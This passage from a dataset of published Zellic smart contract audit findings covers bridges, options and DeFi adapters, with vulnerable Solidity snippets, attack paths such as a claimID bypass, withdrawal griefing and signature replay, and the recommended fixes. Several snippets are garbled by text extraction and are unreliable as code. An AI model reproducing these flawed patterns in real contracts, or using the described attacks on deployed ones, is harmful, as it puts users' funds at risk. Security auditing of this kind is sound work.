The issue was fixed in commit 86e24fe. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.13 Incorrect weights calculation", + "labels": [ + "Zellic" + ], + "body": "Target: PositionSizer Category: Coding Mistakes Likelihood: Medium Severity: Medium : Medium The function _thresholdWeight performs a calculation of weights for a set of vaults based on their return on investment (ROI) compared to a threshold value. However, during the process of identifying valid vaults, the validIds array is populated with both valid indexes and zeros, which leads to unintended behavior. The second loop iterates over this array to calculate weights only until validCount. But validCount is less than the actual validIds size. So the weights will be calculated only for the first validCount elements from the validIds array, regardless of whether they are valid indexes or zeros. function _thresholdWeight( address[] memory vaults, uint256[] memory epochIds ) internal view returns (uint256[] memory weights) { ...)) for (uint256 i; i < vaults.length; ) { uint256 roi = _fetchReturn(vaults[i], epochIds[i], marketIds[i]); if (roi > threshold) { validCount += 1; validIds[i] = i; } unchecked { i+); } } ...)) uint256 modulo = 10_000 % validCount; for (uint j; j < validCount; ) { uint256 location = validIds[j]; weights[location] = 10_000 / validCount; if (modulo > 0) { weights[location] += 1; modulo -= 1; } Zellic Y2K Finance unchecked { j+); } } } This behavior leads to missing weights calculations for a portion of the valid vaults. We recommend correcting the second loop so that it iterates the entire length of the validIds array and counts the weights only if the validIds[j] is not zero. The issue was fixed in commit d9ee9d3. Zellic Y2K Finance", + "html_url": "https://github.com/Zellic/publications/blob/master/Y2K Finance - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Withdrawal finalization does not work", + "labels": [ + "Zellic" + ], + "body": "Target: Bridge2 Category: Coding Mistakes Likelihood: High Severity: High : High The single entry point for finalizing withdrawals is the batchedFinalizeWithdrawals function, which iterates over an array of messages and calls finalizeWithdrawal on each. Both functions have the nonReentrant modifier. function batchedFinalizeWithdrawals( bytes32[] calldata messages ) external nonReentrant whenNotPaused { checkFinalizer(msg.sender); uint64 end = uint64(messages.length); for (uint64 idx; idx < end; idx+)) { finalizeWithdrawal(messages[idx]); } } function finalizeWithdrawal(bytes32 message) private nonReentrant whenNotPaused { require(!finalizedWithdrawals[message], \u201dWithdrawal already finalized\u201d); Withdrawal memory withdrawal = requestedWithdrawals[message]; checkDisputePeriod(withdrawal.requestedTime, withdrawal.requestedBlockNumber); finalizedWithdrawals[message] = true; usdcToken.transfer(withdrawal.user, withdrawal.usdc); emit FinalizedWithdrawal( FinalizedWithdrawalEvent({ user: withdrawal.user, Zellic Hyperliquid usdc: withdrawal.usdc, nonce: withdrawal.nonce, message: withdrawal.message }) ); } Any finalization attempt will immediately revert because of the nonReentrant mod- ifier on finalizeWithdrawal, preventing any withdrawal from the bridge from being finalized. We classified this issue as high severity due to the fundamental importance of the finalization step for the contract operation. 
We recommend removing the nonReentrant modifier from the private finalizeWithd rawal function and adding test cases to ensure its correct behavior. This issue has been acknowledged by the Hyperliquid contributors, and a fix was im- plemented in commit e5b7e068. Zellic Hyperliquid", + "html_url": "https://github.com/Zellic/publications/blob/master/Hyperliquid - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Disputed actions are not blocked by validator rotation", + "labels": [ + "Zellic" + ], + "body": "Target: Bridge2 Category: Business Logic Likelihood: Low Severity: High : Medium The bridge implements a two-step mechanism for performing withdrawals and val- idator set changes. First, a request authorizing the action has to be submitted. The request has to be signed by a two thirds majority of validators. If the request is valid, it is recorded in the contract storage. The second step, finalization, actually performs the requested action and can only occur after a dispute period has elapsed. The dispute period gives the opportunity to pause the contract in the event of one or more validators being compromised. Un- pausing the contract also requires to rotate the validator set, allowing replacement of the compromised validators. However, the current implementation does not allow to remove pending operations. For example, if a malicious withdrawal was detected and the contract was paused, the operation would stay pending and could be processed when the contract is unpaused. If a sufficiently large subset of hot wallets is compromised, the dispute period does not effectively allow malicious withdrawals or validator set updates to be blocked. Even if validators are rotated, pending actions would still be able to be finalized when the contract is unpaused. We recommend adding a mechanism for invalidating pending messages. For exam- ple, this could be implemented in the emergencyUnlock function. This issue has been acknowledged by the Hyperliquid contributors, and a fix was im- plemented in commit 8c4a182a. Zellic Hyperliquid", + "html_url": "https://github.com/Zellic/publications/blob/master/Hyperliquid - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Missing message validation may allow griefing", + "labels": [ + "Zellic" + ], + "body": "Target: Bridge2 Category: Business Logic Likelihood: Low Severity: Informational : Informational The finalizeWithdrawals function does not check that the given message corresponds to an existing withdrawal request. Since the uninitialized values of the corresponding withdrawal data will be zero, the call to checkDisputePeriod will pass: function checkDisputePeriod(uint64 time, uint64 blockNumber) private view { require( block.timestamp > time + disputePeriodSeconds &) (uint64(block.number) - blockNumber) * blockDurationMillis > 1000 * disputePeriodSeconds, \u201dStill in dispute period\u201d ); } When messages do not correspond to existing withdrawals, they will cause a transfer of zero tokens to the zero address. In the case of USDC on Arbitrum, this will currently result in a revert. However, if this logic is reused for other ERC-20 tokens, there is no guarantee that such a call will be blocked. Then, although the message does not correspond to an existing withdrawal, it will be marked as finalized, anyway: finalizedWithdrawals[message] = true; usdcToken.transfer(withdrawal.user, withdrawal.usdc); Thus, any future attempts to finalize that message will fail. If an attacker is able to 1. predict upcoming nonces, or 2. 
front-run withdrawal requests, Zellic Hyperliquid they would be able to block real withdrawals from being finalized. Consider checking that messages correspond to existing withdrawals during the fi- nalization process. In the case of USDC, this has the additional benefit of improving the error message. This issue has been acknowledged by the Hyperliquid contributors, and a fix was im- plemented in commit 1c8d3333. Zellic Hyperliquid", + "html_url": "https://github.com/Zellic/publications/blob/master/Hyperliquid - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Signatures may be reused across different contracts", + "labels": [ + "Zellic" + ], + "body": "Target: Signature Category: Business Logic Likelihood: Low Severity: Informational : Informational On the Arbitrum side, the bridge operates by allowing users to perform actions ap- proved by validators. For instance, to request a withdrawal, the user needs at least two thirds of the validators (if validator power is equally distributed) to sign off us- ing their in-memory hot keys. The bridge checks these signatures, and if the user is indeed permitted to perform the withdrawal, it transfers them the USDC. Currently, signatures include a domain separator to prevent reuse across different chains and projects. This is important to ensure that they are specific to the context in which they are used and cannot be maliciously repurposed. function makeDomainSeparator() view returns (bytes32) { return keccak256( abi.encode( EIP712_DOMAIN_SEPARATOR, keccak256(bytes(\u201dExchange\u201d)), keccak256(bytes(\u201d1\u201d)), block.chainid, VERIFYING_CONTRACT ) ); } However, the signatures do not include the contract or token address. The fact that the domain separator does not by default include any contract-specific data introduces some maintenance risk: the protocol must ensure that signatures can- not be reused across contracts on the same chain. For instance, if the exact same contract were used for a different ERC-20 token, an attacker may be able to steal funds by replaying withdrawal messages. Zellic Hyperliquid We recommend including either the contract address or the token address in signa- tures (either the domain separator or in the message itself) to increase robustness and avoid future issues. This issue has been acknowledged by the Hyperliquid contributors, and a fix was im- plemented in commit 97225667. Zellic Hyperliquid", + "html_url": "https://github.com/Zellic/publications/blob/master/Hyperliquid - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Withdrawal and validator update signatures include no ac- tion", + "labels": [ + "Zellic" + ], + "body": "Target: Bridge2 Category: Business Logic Likelihood: N/A Severity: Informational : Informational To include important parameters in signatures, the bridge packs them together and hashes them. This data is stored in the connectionId slot of the Agent struct, which has an associated function hash for creating the actual signed message. struct Agent { string source; bytes32 connectionId; } In some functions, the hashed data in connectionId includes the name of an action: Agent memory agent = Agent(\u201da\u201d, keccak256(abi.encode(\u201dmodifyLocker\u201d, locker, isLocker, nonce))); However, the connectionIds used in the requestWithdrawal and updateValidatorSet Agent\u2019s do not. Instead, they rely on the arguments being different to prevent valid signatures from being used in the wrong function. 
From requestWithdrawal and upda teValidatorSet: Agent memory agent = Agent(\u201da\u201d, keccak256(abi.encode(msg.sender, usdc, nonce))); Agent memory agent = Agent( \u201da\u201d, keccak256( abi.encode( newValidatorSet.epoch, newValidatorSet.hotAddresses, newValidatorSet.coldAddresses, newValidatorSet.powers ) ) Zellic Hyperliquid ); This introduces some maintenance risk: updating these signature arguments may have the unintended consequence of allowing confusion between the two types. That might allow users to use withdrawal signatures to maliciously update validators. We recommend consistently prefixing all messages with the action to guarantee that changes in arguments do not cause bugs. This issue has been acknowledged by the Hyperliquid contributors, and a fix was im- plemented in commit b198269c. Zellic Hyperliquid", + "html_url": "https://github.com/Zellic/publications/blob/master/Hyperliquid - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Using non-contract address as destination blocks future mes- sages", + "labels": [ + "Zellic" + ], + "body": "Target: Endpoint Category: Coding Mistakes Likelihood: Medium Severity: Low : Low An improperly-configured user application (UA) can permanently block itself from communicating with an endpoint by simply sending a message to a UA address that is not a contract. If a UA sends a message with a destination UA address that is not a contract, the following try/catch statement does not catch the exception (as the control structure only catches failures in an external call) causing a revert on the destination chain: try ILayerZeroReceiver(_dstAddress).lzReceive{gas: _gasLimit}(_srcChainId , _srcAddress, _nonce, _payload) { /) success, do nothing, end of the message delivery } catch (bytes memory reason) { /) revert nonce if any uncaught errors/exceptions if the ua chooses the blocking mode storedPayload[_srcChainId][_srcAddress] = StoredPayload(uint64( _payload.length), _dstAddress, keccak256(_payload)); emit PayloadStored(_srcChainId, _srcAddress, _dstAddress, _nonce, _payload, reason); } If the destination chain reverts, the source chain\u2019s nonce remains incremented by 1 while the destination chain\u2019s nonce is unchanged. When the nonces are desynchronized, no messages can be sent to any destination UA address because the destination endpoint assumes the messages are out of order. Endpoints key the nonce map with the source chain ID and source UA address\u2014 Zellic LayerZero Labs meaning this issue can only be exploited as self-denial-of-service. Recommendation Add a check to ensure the destination UA is a valid contract address before attempt- ing to execute its lzReceive function. If the contract address is invalid, the endpoint should route the message to a default contract address that discards the message to keep the nonces synchronized. The issue was also discovered in parallel by LayerZero and a fix will be released with UltraLightNode version 2. 
", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Core - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Out-of-bounds read in __getPrices", + "labels": [ + "Zellic" + ], + "body": "Target: Relayer Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational The __getPrices function uses the MLOAD instruction to read dstNativeAmt from _adapterParameters+66 when txType == 2: if (txType == 2) { uint dstNativeAmt; assembly { dstNativeAmt := mload(add(_adapterParameters, 66)) } require(dstConfig.dstNativeAmtCap >= dstNativeAmt, \"Relayer: dstNativeAmt too large\"); totalRemoteToken = totalRemoteToken.add(dstNativeAmt); } At the start of the function, it checks that the size of _adapterParameters is either 34 bytes or greater than 66 bytes: require(_adapterParameters.length == 34 || _adapterParameters.length > 66, \"Relayer: wrong _adapterParameters size\"); Because the assertion allows an _adapterParameters of a size smaller than the offset added to the size of the memory read, the read could potentially be out of bounds. There is no direct security impact of this instance of out-of-bounds read. However, this code pattern allows undefined behavior and is potentially dangerous. In the past, even low-level vulnerabilities have been chained with other bugs to achieve critical security compromises. Recommendation The size of a uint (which is internally a uint256) is 32 bytes. So, the branch that uses the MLOAD instruction should require that the size of _adapterParameters is greater than or equal to the read size added to the offset, or 98 bytes (32+66). The issue has been acknowledged by LayerZero.", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Core - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Messaging library provides a function to renounce ownership", + "labels": [ + "Zellic" + ], + "body": "Target: UltraLightNode Category: Business Logic Likelihood: N/A Severity: Informational : Informational The messaging library, UltraLightNode (ULN), implements Ownable, which provides a method named renounceOwnership that removes the current owner (reference). This is likely not a desired feature of the ULN. If renounceOwnership were called, the contract would be left without an owner. Recommendation Override the renounceOwnership function: function renounceOwnership() public { revert(\"This feature is not available.\"); } The issue has been acknowledged by LayerZero.", + "html_url": "https://github.com/Zellic/publications/blob/master/LayerZero Core - Zellic Audit Report.pdf" + }, + { + "title": "3.1 USDT transfers can be forced to revert for subsequent users", + "labels": [ + "Zellic" + ], + "body": "Target: All Adapters Category: Business Logic Likelihood: Medium Severity: Medium : Medium In several adapters, there are external functions designed specifically for use by SushiXSwapV2. However, users can call these functions without restriction, leading to unintended side effects or malicious actions. function swap( uint256 _amountBridged, bytes calldata _swapData, address _token, bytes calldata _payloadData ) external payable override { // ... IERC20(rpd.tokenIn).safeIncreaseAllowance(address(rp), _amountBridged); rp.processRoute( rpd.tokenIn, _amountBridged != 0 ?
_amountBridged : rpd.amountIn, rpd.tokenOut, rpd.amountOutMin, rpd.to, rpd.route ); } A malicious user can exploit a specific sequence of function calls to leave an allowance on certain tokens like USDT, which will cause a revert when attempting to approve if the allowance has not been previously set to 0. An example of this is when a user calls the Axelar adapter\u2019s swap function and provides a specific route to the RouteProcessor that does not fully utilize the allowance. As a result, other users attempting to use the Axelar adapter with USDT will encounter a revert, preventing them from successfully completing the operation. To fix this issue, it is recommended to zero the USDT allowance where applicable. This will ensure that the allowance is properly reset and prevent the above scenario. This finding was fixed in commit b9f1a4ab by changing from a pull method via allowances to a push method that directly transfers tokens instead.", + "html_url": "https://github.com/Zellic/publications/blob/master/SushiXSwap V2 - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Refunds sent to tx.origin", + "labels": [ + "Zellic" + ], + "body": "Target: AxelarAdapter, CCTPAdapter, StargateAdapter Category: Coding Mistakes Likelihood: Low Severity: Low : Low The Axelar, CCTP, and Stargate adapters use tx.origin as the address that receives gas refunds in their implementation of adapterBridge. This might not be the desired recipient of the refund. For example, consider the case of an EOA (user) invoking a contract that in turn calls SushiXSwap to bridge an asset owned by the contract (and paying for gas using the contract balance). A refund for excess gas would be credited to the user, even though the contract has paid for gas. In some cases, gas refunds might be credited to an incorrect recipient. One possible solution is for SushiXSwap to pass the intended recipient for gas refunds to adapterBridge. This way, SushiXSwap could pass msg.sender as the gas refund recipient, which seems to be a more sensible choice. This finding was fixed in commit b9f1a4ab by introducing a variable that allows users to specify an address to refund to.", + "html_url": "https://github.com/Zellic/publications/blob/master/SushiXSwap V2 - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Gas limit ignored by executePayload", + "labels": [ + "Zellic" + ], + "body": "Target: AxelarAdapter, CCTPAdapter, StargateAdapter Category: Coding Mistakes Likelihood: Low Severity: Low : Low The Axelar, CCTP, and Stargate adapters\u2019 implementation of executePayload ignores the PayloadData::gasLimit field, which seems to be intended to be used as the gas limit for the call to PayloadData::target. The target of the IPayloadExecutor(pd.target).onPayloadReceive call could use more gas than intended. However, we note that while executePayload is an external function, it is intended to be called by _executeWithToken or _execute, which do limit the gas passed to executePayload, preventing the transaction from consuming all the available gas when the contract is used as intended by the developer. Set the gas limit on the IPayloadExecutor(pd.target).onPayloadReceive call to pd.gasLimit. This finding was fixed in commit b9f1a4ab by setting the gas limit of the relevant function calls.
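As a sketch of the recommended pattern (the payload argument name _payloadData is assumed for illustration, not taken from the codebase): IPayloadExecutor(pd.target).onPayloadReceive{gas: pd.gasLimit}(_payloadData); forwards at most pd.gasLimit gas to the target, so a misbehaving executor cannot consume all of the gas available to the transaction.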
", + "html_url": "https://github.com/Zellic/publications/blob/master/SushiXSwap V2 - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Multiple contracts provide a function to renounce ownership", + "labels": [ + "Zellic" + ], + "body": "Target: StakingRewards, MUNIState, MUNI Category: Business Logic Likelihood: N/A Severity: Informational : Informational The StakingRewards, MUNIState, and MUNI contracts implement Ownable, which provides a method named renounceOwnership that removes the current owner (reference). This is likely not a desired feature. If renounceOwnership were called, the contract would be left without an owner. Recommendation Override the renounceOwnership function: function renounceOwnership() public { revert(\"This feature is not available.\"); } DFX Finance acknowledged this finding and created a fix in pull request #35.", + "html_url": "https://github.com/Zellic/publications/blob/master/Muni - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Lack of interfaces for MUNILogicV1 and MUNI", + "labels": [ + "Zellic" + ], + "body": "Target: MUNILogicV1, MUNI Category: Code Maturity Likelihood: N/A Severity: Informational : Informational Interfaces for the public APIs of MUNILogicV1 and MUNI do not exist. Interactions with smart contracts may be more difficult; it is a composability issue for future developers who want to build upon or understand the codebase. Recommendation We recommend adding all exposed/public APIs to interfaces in a way that accurately reflects the underlying code. DFX Finance acknowledged this finding and created a fix in pull request #37.", + "html_url": "https://github.com/Zellic/publications/blob/master/Muni - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Unhandled division-by-zero error in borrowAsset()", + "labels": [ + "Zellic" + ], + "body": "Target: SiloGateway Category: Coding Mistakes Likelihood: N/A Severity: Informational : Informational In the borrowAsset() function, there is no check for the possibility of totalAsset being 0, which could lead to a division-by-zero error in numerator / totalAsset. function borrowAsset( address _silo, uint256 _borrowAmount, uint256 _collateralAmount, address _collateralAsset, address _receiver ) external nonReentrant { (uint256 totalAsset, ) = ISilo(_silo).totalAsset(); (uint256 totalBorrow, ) = ISilo(_silo).totalBorrow(); uint256 numerator = UTIL_PREC * (totalBorrow + _borrowAmount); uint256 utilizationRate = numerator / totalAsset; // ... If totalAsset is 0 and someone tries to execute the borrowAsset, the transaction will revert due to the division by zero. Add a zero check on totalAsset for a more graceful and informative handling of this situation. require(totalAsset != 0, \"Total Asset is zero\"); This issue has been acknowledged by Sturdy, and a fix was implemented in commit ca396917.", + "html_url": "https://github.com/Zellic/publications/blob/master/Sturdy - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Un-encoded claimID can be used in write()", + "labels": [ + "Zellic" + ], + "body": "Target: OptionSettlementEngine Category: Coding Mistakes Likelihood: Medium Severity: High : High Users are allowed to create a position in an option through the write() function. This allows passing both the optionID, which corresponds to the option at hand, and the claimID, which corresponds to the claim that a user has when wanting to redeem the position.
Currently, the only performed check is that the lower 96 bits of both the claimID and optionID are identical. function write(uint256 optionId, uint112 amount, uint256 claimId) public returns (uint256) { (uint160 optionKey, uint96 decodedClaimNum) = decodeTokenId(optionId); // optionId must be zero in lower 96b for provided option Id if (decodedClaimNum != 0) { revert InvalidOption(optionId); } // claim provided must match the option provided if (claimId != 0 && ((claimId >> 96) != (optionId >> 96))) { revert EncodedOptionIdInClaimIdDoesNotMatchProvidedOptionId(claimId, optionId); } // ... If an attacker were to call write() with claimID identical to optionID, then they would effectively bypass the current checks, and instead of minting X options and one claim, they could mint X + 1 options and no claim. function write(uint256 optionId, uint112 amount, uint256 claimId) public returns (uint256) { uint256 encodedClaimId = claimId; // @audit-info assume the claimId has already been encoded. if (claimId == 0) { // ... } else { // check ownership of claim uint256 balance = balanceOf[msg.sender][encodedClaimId]; if (balance != 1) { revert CallerDoesNotOwnClaimId(encodedClaimId); } // retrieve claim OptionLotClaim storage existingClaim = _claim[encodedClaimId]; existingClaim.amountWritten += amount; } // ... if (claimId == 0) { // Mint options and claim token to writer uint256[] memory tokens = new uint256[](2); tokens[0] = optionId; tokens[1] = encodedClaimId; // @audit-info assumes encodedClaimId is no longer the same as claimId // at this point, however, encodedClaimId = claimId = optionId uint256[] memory amounts = new uint256[](2); amounts[0] = amount; amounts[1] = 1; // claim NFT _batchMint(msg.sender, tokens, amounts, \"\"); Not minting the accompanying claim NFT leads to indefinitely locking the collateral that was associated with that particular claim. We recommend assuring that encodedClaimId can never be the same as optionID. The issue has been fixed in commit 05f8f561.", + "html_url": "https://github.com/Zellic/publications/blob/master/Valorem - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Rounding error in the redeem mechanism", + "labels": [ + "Zellic" + ], + "body": "Target: OptionSettlementEngine Category: Business Logic Likelihood: High Severity: High : High During the redeem process, the _getAmountExercised function is called. function _getAmountExercised(OptionLotClaimIndex storage claimIndex, OptionsDayBucket storage claimBucketInfo) internal view returns (uint256 _exercised, uint256 _unexercised) { // The ratio of exercised to written options in the bucket multiplied by the // number of options actually written in the claim. _exercised = FixedPointMathLib.mulDivDown( claimBucketInfo.amountExercised, claimIndex.amountWritten, claimBucketInfo.amountWritten ); // The ratio of unexercised to written options in the bucket multiplied by the // number of options actually written in the claim. _unexercised = FixedPointMathLib.mulDivDown( claimBucketInfo.amountWritten - claimBucketInfo.amountExercised, claimIndex.amountWritten, claimBucketInfo.amountWritten ); } Due to the nature of how the amounts of exercised and unexercised options are calculated, there is the possibility of a rounding error. This may happen if (claimBucketInfo.amountWritten - claimBucketInfo.amountExercised) * claimIndex.amountWritten < claimBucketInfo.amountWritten.
For example, this applies when the amount that was exercised globally has almost reached the amount that was written globally, and a user\u2019s written claim is relatively low. In this case, the user will receive no underlying tokens, even though they have exercised their options, as well as slightly less exercise tokens than they should have. Depending on the variables of the equations, the user may potentially incur a loss of some or all of their unexercised or exercised tokens. This issue was identified by the Valorem team and verified by Zellic. Valorem implemented changes to the calculations in underlying(), redeem(), and claim(), by placing all multiplication before division, to prevent loss of precision. During the remediation phase of the audit, Valorem implemented significant changes to the options\u2019 writing mechanism and overall contract architecture in order to address the issues that were identified. A thorough examination will be conducted during the next audit phase to confirm that these changes have effectively resolved the issue.", + "html_url": "https://github.com/Zellic/publications/blob/master/Valorem - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Writing during the exercise period may lead to arbitrage opportunities", + "labels": [ + "Zellic" + ], + "body": "Target: OptionSettlementEngine Category: Business Logic Likelihood: Medium Severity: Medium : Medium Currently, a user is allowed to write an option until its expiry date. The exercise period, however, lasts from the exercise to the expiry timestamps of an option. function write(uint256 optionId, uint112 amount, uint256 claimId) public returns (uint256) { // ... Option storage optionRecord = _option[optionKey]; uint40 expiry = optionRecord.expiryTimestamp; if (expiry == 0) { revert InvalidOption(optionKey); } if (expiry <= block.timestamp) { revert ExpiredOption(optionId, expiry); } // ... } function exercise(uint256 optionId, uint112 amount) external { // ... Option storage optionRecord = _option[optionKey]; if (optionRecord.expiryTimestamp <= block.timestamp) { revert ExpiredOption(optionId, optionRecord.expiryTimestamp); } // Require that we have reached the exercise timestamp if (optionRecord.exerciseTimestamp >= block.timestamp) { revert ExerciseTooEarly(optionId, optionRecord.exerciseTimestamp); } // ... } This overlapping of the writing and exercising periods is prone to arbitrage opportunities. Due to the way the options\u2019 buckets are organized (per day), one can predict that should a specific exercise happen in today\u2019s bucket, writing to it leads to a guaranteed share of the exercise tokens. The arbitrage opportunity does not lead to loss of funds for the user; however, it may lead to unexpected returns in terms of exercise tokens of an option. We recommend either disallowing the writing of options during the exercise period or creating a time buffer such that only buckets that have been written at least one day prior to the current epoch can be exercised. During the remediation phase of the audit, Valorem implemented significant changes to the options\u2019 writing mechanism and overall contract architecture in order to address the issues that were identified. A thorough examination will be conducted during the next audit phase to confirm that these changes have effectively resolved the issue.
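For reference, an illustrative sketch of the first suggested mitigation (the custom error name is hypothetical, not Valorem\u2019s code): in write(), additionally check if (optionRecord.exerciseTimestamp <= block.timestamp) { revert WriteDuringExercisePeriod(optionId); } so that no new options can be written into a bucket once its exercise window has opened.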
", + "html_url": "https://github.com/Zellic/publications/blob/master/Valorem - Zellic Audit Report.pdf" + }, + { + "title": "3.4 The _claimIdToClaimIndexArray mapping is not reset in the redeem() function", + "labels": [ + "Zellic" + ], + "body": "Target: OptionSettlementEngine Category: Business Logic Likelihood: Low Severity: Low : Low The _claim mapping contains the OptionLotClaimIndex object for claimId. This points the claimId to a claim\u2019s indices in the _claimIndexArray array. The information is created during the _addOrUpdateClaimIndex call. During the redeem call, an internal _getPositionsForClaim is called, which in turn retrieves the exercise and underlying amounts of a claim. function redeem(uint256 claimId) external { // ... (uint256 exerciseAmount, uint256 underlyingAmount) = _getPositionsForClaim(optionKey, claimId, optionRecord); // ... } function _getPositionsForClaim(uint160 optionKey, uint256 claimId, Option storage optionRecord) internal view returns (uint256 exerciseAmount, uint256 underlyingAmount) { OptionLotClaimIndex storage claimIndexArray = _claimIdToClaimIndexArray[claimId]; for (uint256 i = 0; i < claimIndexArray.length; i++) { OptionLotClaimIndex storage claimIndex = claimIndexArray[i]; OptionsDayBucket storage claimBucketInfo = _claimBucketByOption[optionKey][claimIndex.bucketIndex]; (uint256 amountExercised, uint256 amountUnexercised) = _getAmountExercised(claimIndex, claimBucketInfo); exerciseAmount += optionRecord.exerciseAmount * amountExercised; underlyingAmount += optionRecord.underlyingAmount * amountUnexercised; } } The claimId token is burned, but the storage still contains information about it. This information is no longer necessary, and in the expected behavior of the protocol, it will never be re-used. To avoid further unexpected behavior, we recommend deleting the _claimIdToClaimIndexArray[claimId] object altogether. function redeem(uint256 claimId) external { // ... (uint256 exerciseAmount, uint256 underlyingAmount) = _getPositionsForClaim(optionKey, claimId, optionRecord); delete _claimIdToClaimIndexArray[claimId]; // ... } During the remediation phase of the audit, Valorem implemented significant changes to the options\u2019 writing mechanism and overall contract architecture in order to address the issues that were identified. A thorough examination will be conducted during the next audit phase to confirm that these changes have effectively resolved the issue.", + "html_url": "https://github.com/Zellic/publications/blob/master/Valorem - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Incomplete whitelist and blacklist functionality in ResonateHelper", + "labels": [ + "Zellic" + ], + "body": "Target: ResonateHelper Category: Business Logic Likelihood: Low Severity: Low : Low Once a fxSelector has been added to the whitelist, it cannot later be blacklisted.
For example, if the function has not been blacklisted, it can be set in the whitelist: function whiteListFunction(uint32 selector) external onlySandwichBot glassUnbroken { require(!blackListedFunctionSignatures[selector], \"ER030\"); whiteListedFunctionSignatures[selector] = true; } And if the function has been whitelisted, it can still be blacklisted: function blackListFunction(uint32 selector) external onlySandwichBot glassUnbroken { blackListedFunctionSignatures[selector] = true; } However, if a function has been whitelisted and is then blacklisted, it will still pass the validation check in proxyCall(\u2026) because the function logic only requires the fxSelector to exist in the whitelist: function proxyCall(bytes32 poolId, address vault, address[] memory targets, uint[] memory values, bytes[] memory calldatas) external onlySandwichBot glassUnbroken { for (uint256 i = 0; i < targets.length; i++) { require(calldatas[i].length >= 4, \"ER028\"); // Prevent calling fallback function for re-entry attack bytes memory selector = BytesLib.slice(calldatas[i], 0, 4); uint32 fxSelector = BytesLib.toUint32(selector, 0); require(whiteListedFunctionSignatures[fxSelector], \"ER025\"); } ISmartWallet(_getWalletForFNFT(poolId)).proxyCall(vault, targets, values, calldatas); } If the sandwichbot were to mistakenly set a dangerous function (or a function that later turned out to be dangerous) to the whitelist, they would not be able to later block that function from being passed to proxyCall(...). Include logic to blacklist previously whitelisted functions. The blacklist should be immediately set to include increaseAllowance and approve, as these functions can be used to increase spending allowance, which can trigger transactions that would pass the balance checks on proxyCall(...) in ResonateSmartWallet. Revest has added in the functionality that would allow for blacklisting of previously whitelisted functions in commit f95f9d5ac4ac31057cef185d57a1a7b03df5f199. The functions increaseAllowance and approve have been added to the blacklist in commit f2428392e0ce022cd6fde9cf41e654879c03119c.", + "html_url": "https://github.com/Zellic/publications/blob/master/Revest Resonate Pt. 2 - Zellic Audit Report.pdf" + }, + { + "title": "3.2 ERC20 decimals() method may be unimplemented", + "labels": [ + "Zellic" + ], + "body": "Target: FarmingPool Severity: Informational : Informational Category: Business Logic Likelihood: n/a FarmingPool provides a public method to get the number of decimals of the stakingToken, which calls the decimals method of the underlying IERC20 token. However, the EIP-20 standard declares that the decimals method is optional and that other contracts and interfaces should not rely on it being present. The function could revert or return incorrect data. This may pose a composability risk for other contracts that try to interact with the farming pool. Add documentation stipulating that the decimals method is required, or that the implementation may be unreliable. The issue has been acknowledged by 1inch, and they will add natspec documentation when it is implemented.
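For integrators, a defensive read (an illustrative sketch, not part of this codebase) can guard the external call with try/catch: try IERC20Metadata(token).decimals() returns (uint8 d) { return d; } catch { revert(\"decimals() not implemented\"); } where IERC20Metadata is OpenZeppelin\u2019s optional-metadata interface.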
", + "html_url": "https://github.com/Zellic/publications/blob/master/1inch Farming Audit Report.pdf" + }, + { + "title": "3.3 Undocumented code", + "labels": [ + "Zellic" + ], + "body": "Target: Multiple contracts Severity: Low : Informational Category: Code Maturity Likelihood: n/a The methods in the contracts FarmingPool, IFarmingPool, ERC20Farmable, Farm, IFarm, UserAccounting, FarmAccounting, and IERC20Farmable lack documentation in general. There are few or no code comments available. This is a source of developer confusion and a general coding hazard. Lack of documentation, or unclear documentation, is a major pathway to future bugs. It is best practice to document all code. Documentation also helps third-party developers integrate with the platform, and helps any potential auditors more quickly and thoroughly assess the code. Since there are plans to eventually merge the contracts into OpenZeppelin, a widespread community library, the code should be as mature as possible. Document the functions in the affected contracts so that the purpose, preconditions, and semantics are clearly explained. Return values and function arguments should be detailed to help prevent mistakes when calling the functions. The issue has been acknowledged by 1inch, and they will add additional documentation.", + "html_url": "https://github.com/Zellic/publications/blob/master/1inch Farming Audit Report.pdf" + }, + { + "title": "3.4 Internal discrepancy between function access control", + "labels": [ + "Zellic" + ], + "body": "Target: Farm, FarmingPool Severity: Low : Informational Category: Code Maturity Likelihood: n/a The functions _updateCheckpoint in Farm and FarmingPool both have the private access control modifier. However, when passed to the startFarming function as a callback, the parameter type is labeled as internal. A manual review found no security issues with the current implementation. However, while there is no immediate impact, inconsistencies like these can make the code confusing and difficult to reason about, which could lead to future bugs. Since there are plans to eventually merge the contracts into OpenZeppelin, a widespread community library, the code should be as mature as possible. Modify the function _updateCheckpoint to be an internal function if this was not a deliberate design decision. The issue was fixed by 1inch in commit e513e429.", + "html_url": "https://github.com/Zellic/publications/blob/master/1inch Farming Audit Report.pdf" + }, + { + "title": "3.5 Some methods are not exposed by their interface", + "labels": [ + "Zellic" + ], + "body": "Target: IFarm, IFarmingPool Severity: Low : Informational Category: Code Maturity Likelihood: n/a The interfaces IFarm and IFarmingPool do not expose the following methods from their concrete implementation: IFarm.sol is missing startFarming (Farm.sol); IFarmingPool.sol is missing startFarming (FarmingPool.sol) and decimals (FarmingPool.sol). The interfaces also do not expose the onlyOwner setDistributor function, but we assume this is part of the intended design. Consumers of this interface will not be able to call the unexposed methods. If this is not the intended design, add the methods to the interface declarations. The issue was fixed by 1inch in commit 29bf4aed.
